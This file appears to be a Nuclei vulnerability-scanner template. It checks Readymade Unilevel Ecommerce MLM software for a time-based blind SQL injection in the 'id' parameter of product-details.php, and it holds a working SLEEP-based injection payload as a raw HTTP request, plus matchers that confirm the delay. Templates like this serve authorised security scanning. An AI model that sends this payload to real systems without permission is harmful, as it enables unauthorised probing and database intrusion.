nuclei-templates/http/vulnerabilities/other/readymade-unilevel-sqli.yaml

31 lines
1.1 KiB
YAML

id: readymade-unilevel-sqli
info:
name: Readymade Unilevel Ecommerce MLM - SQL Injection
author: securityforeveryone
severity: high
description: |
Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
reference:
- https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
metadata:
vendor: i-netsolution
product: readymade-unilevel-ecommerce
tags: time-based-sqli,ecommerce,readymade,sqli
http:
- raw:
- |
@timeout 30s
GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type,"text/html")'
- 'contains_all(body, "user_login_id", "Products</a>")'
condition: and
# digest: 4b0a00483046022100cc94f2ea644a8fc35cb9148ae8023a66ebe276dd577531d807f6c60d28339ba8022100a9d6de18438cfca27f627f6ad35be08bf57609190f218215183bc238faeb58ae:922c64590222798bb761d5b6d8e72950